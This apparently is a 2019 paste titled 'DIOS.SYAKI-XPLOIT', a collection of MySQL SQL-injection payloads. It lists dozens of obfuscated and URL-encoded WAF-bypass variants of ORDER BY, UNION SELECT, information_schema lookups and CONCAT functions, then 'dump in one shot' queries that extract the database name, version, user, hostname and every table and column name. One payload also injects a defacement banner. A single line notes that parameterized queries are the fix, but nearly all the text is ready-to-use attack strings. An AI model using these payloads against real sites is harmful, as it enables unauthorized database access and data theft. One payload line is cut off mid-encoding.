syaki

DIOS.SYAKI-XPLOIT

Jul 19th, 2019
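  1. Dios pada bagian Order by :
  2. Note: MySQL executes the contents of /*! ... */ comments (with a version number, only on servers at or above that version), so keyword filters that do not normalise comments, letter case and URL-encoding before matching miss every variant below; parameterized queries are the fix, and a WAF rule is only a secondary layer.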
  3.  
  4. /**/ORDER/**/BY/**/
  5. /*!order*/+/*!by*/
  6. /*!ORDER BY*/
  7. /*!50000ORDER BY*/
  8. /*!50000ORDER*//**//*!50000BY*/
  9. /*!12345ORDER*/+/*!BY*/
  10.  
  11. Dios pada bagian Union Select :
  12.  
  13. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  14. '+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/
  15. 'And/**/.0union/*%26*/distinctROW+select+
  16. '+union(select(1),(2),(3),(4),(5),(6),(7),(8),(9))
  17. %55nion(%53elect 1,2,3)-- -
  18. +union+distinct+select+
  19. +union+distinctROW+select+
  20. /**//*!12345UNION SELECT*//**/
  21. /*!%55NiOn*/ /*!%53eLEct*/
  22. %55nion(%53elect 1,2,3)-- -
  23. +union+distinct+select+
  24. +union+distinctROW+select+
  25. /**//*!50000UNION SELECT*//**/
  26. /**/UNION/**//*!50000SELECT*//**/
  27. /*!50000UniON SeLeCt*/
  28. union /*!50000%53elect*/
  29. +#uNiOn+#sEleCt
  30. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  31. /*!%55NiOn*/ /*!%53eLEct*/
  32. /*!u%6eion*/ /*!se%6cect*/
  33. +un/**/ion+se/**/lect
  34. uni%0bon+se%0blect
  35. %2f**%2funion%2f**%2fselect
  36. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  37. REVERSE(noinu)+REVERSE(tceles)
  38. /*--*/union/*--*/select/*--*/
  39. union (/*!/**/ SeleCT */ 1,2,3)
  40. /*!union*/+/*!select*/
  41. union+/*!select*/
  42. /**/union/**/select/**/
  43. /**/uNIon/**/sEleCt/**/
  44. /**//*!union*//**//*!select*//**/
  45. /*!uNIOn*/ /*!SelECt*/
  46. +union+distinct+select+
  47. +union+distinctROW+select+
  48. +UnIOn%0d%0aSeleCt%0d%0a
  49. UNION/*&test=1*/SELECT/*&pwn=2*/
  50. un?+un/**/ion+se/**/lect+
  51. +UNunionION+SEselectLECT+
  52. +uni%0bon+se%0blect+
  53. %252f%252a*/union%252f%252a /select%252f%252a*/
  54. /%2A%2A/union/%2A%2A/select/%2A%2A/
  55. %2f**%2funion%2f**%2fselect%2f**%2f
  56. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  57. /*!UnIoN*/SeLecT+
  58. Union Select bypass with URL-encoded method:
  59. %55nion(%53elect)
  60. union%20distinct%20select
  61. union%20%64istinctRO%57%20select
  62. union%2053elect
  63. %23?%0auion%20?%23?%0aselect
  64. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  65. %55nion %53eLEct
  66. u%6eion se%6cect
  67. unio%6e %73elect
  68. unio%6e%20%64istinc%74%20%73elect
  69. union%23pawpawpawpaw%0aselect
  70. /**/UNION/**/SELECT/**/
  71. uni%6fn distinct%52OW s%65lect
  72. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
  73.  
  74. Dios pada bagian Information_schema.tables :
  75.  
  76. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  77. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  78. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  79. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  80. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  81. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  82.  
  83. Dios pada bagian Concat :
  84.  
  85. CoNcAt()
  86. concat()
  87. CON%08CAT()
  88. CoNcAt()
  89. %0AcOnCat()
  90. /**//*!12345cOnCat*/
  91. /*!50000cOnCat*/(/*!*/)
  92. unhex(hex(concat(table_name)))
  93. unhex(hex(/*!12345concat*/(table_name)))
  94. unhex(hex(/*!50000concat*/(table_name)))
  95.  
  96. Dios pada bagian Group_Concat :
  97.  
  98. /*!group_concat*/()
  99. gRoUp_cOnCAt()
  100. group_concat(/*!*/)
  101. group_concat(/*!12345table_name*/)
  102. group_concat(/*!50000table_name*/)
  103. /*!group_concat*/(/*!12345table_name*/)
  104. /*!group_concat*/(/*!50000table_name*/)
  105. /*!12345group_concat*/(/*!12345table_name*/)
  106. /*!50000group_concat*/(/*!50000table_name*/)
  107. /*!GrOuP_ConCaT*/()
  108. /*!12345GroUP_ConCat*/()
  109. /*!50000gRouP_cOnCaT*/()
  110. /*!50000Gr%6fuP_c%6fnCAT*/()
  111. unhex(hex(group_concat(table_name)))
  112. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  113. unhex(hex(/*!12345group_concat*/(table_name)))
  114. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  115. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  116. unhex(hex(/*!50000group_concat*/(table_name)))
  117. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  118. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  119. convert(group_concat(table_name)+using+ascii)
  120. convert(group_concat(/*!table_name*/)+using+ascii)
  121. convert(group_concat(/*!12345table_name*/)+using+ascii)
  122. convert(group_concat(/*!50000table_name*/)+using+ascii)
  123. CONVERT(group_concat(table_name)+USING+latin1)
  124. CONVERT(group_concat(table_name)+USING+latin2)
  125. CONVERT(group_concat(table_name)+USING+latin3)
  126. CONVERT(group_concat(table_name)+USING+latin4)
  127. CONVERT(group_concat(table_name)+USING+latin5)
  128.  
  129.  
  130. Dios collection #############
  131.  
  132. concat_ws('<br>','AZZATSSINS',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))
  133.  
  134. (select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.schemata)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,schema_name))))x)
  135.  
  136. (select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.tables)%20where%20(table_schema=database())%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,table_name))))x)
  137.  
  138. concat(@c:=0x00,if((select%20count(*)%20from%20information_schema.columns%20where%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)
  139.  
  140. concat%0b(@c:=0x00,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)
  141.  
  142. concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/
  143.  
  144. export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
  145.  
  146. (select+concat(0x3c666f6e7420666163653d43616d627269612073697a653d323e72306f74404833583439203a3a20,version(),0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x446174616261736573203a7e205b,(Select+count(Schema_name)from(information_Schema.schemata)),0x5d3c62723e5461626c6573203a7e205b,(Select+count(table_name)from(information_schema.tables)),0x5d3c62723e436f6c756d6e73203a7e205b,(Select+count(column_name)from(information_Schema.columns)),0x5d3c62723e,@)from(select(@:=0x00),(@db:=0),(@db_nr:=0),(@tbl:=0),(@tbl_nr:=0),(@col_nr:=0),(select(@)from(information_Schema.columns)where(@)in(@:=concat(@,if((@db!=table_schema),concat((@tbl_nr:=0x00),0x3c666f6e7420636f6c6f723d7265643e,LPAD(@db_nr:=@db_nr%2b1,2,0x20),0x2e20,@db:=table_schema,0x2020202020203c666f6e7420636f6c6f723d707572706c653e207b205461626c6573203a7e205b,(Select+count(table_name)from(information_schema.tables)where(table_schema=@db)),0x5d7d203c2f666f6e743e3c2f666f6e743e),0x00),if((@tbl!=table_name),concat((@col_nr:=0x00),0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD(@tbl_nr:=@tbl_nr%2b1,3,0x0b),%200x2e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a7e20205b,(Select+count(column_name)from(information_Schema.columns)where(table_name=@tbl)),0x5d202f203c666f6e7420636f6c6f723d626c61636b3e205265636f726473203a7e205b,(Select+if%20null(table_rows,0x30)+from+information_schema.tables+where+table_name=@tbl),0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e),0x00),concat(0x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD(@col_nr:=@col_nr%2b1,3,0x0b),0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e)))))x)
  147.  
  148. +and@x:=concat+(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x3a3a,column_name)),@)/*!50000UNION*/SELECT+
  149.  
  150. (select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
  151.  
  152. (select(@x)from(select(@x:=0x00),(@nr:=0),(@tbl:=0x0),(select(0)from(information_schema.tables)where(table_schema=database())and(0x00)in(@x:=concat_ws(0x20,@x,lpad(@nr:=@nr%2b1,3,0x0b),0x2e20,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,(select+count(*)+from+information_schema.columns+where+table_name=@tbl),0x3c2f666f6e743e5d20207d3c2f666f6e743e,0x3c62723e))))x)
  153.  
  154. (/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
  155.  
  156. (/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*)%20from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@))
  157.  
  158.  
  159.  
  160. #Dios Waff pennywise
  161. concat_ws('<br>','INJECTED BY SYAKI XPLOIT','<br>','<img+src="https://i.ibb.co/6XfGMBM/1563157653897-picsay.pngm"height="500px"width="500px">',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))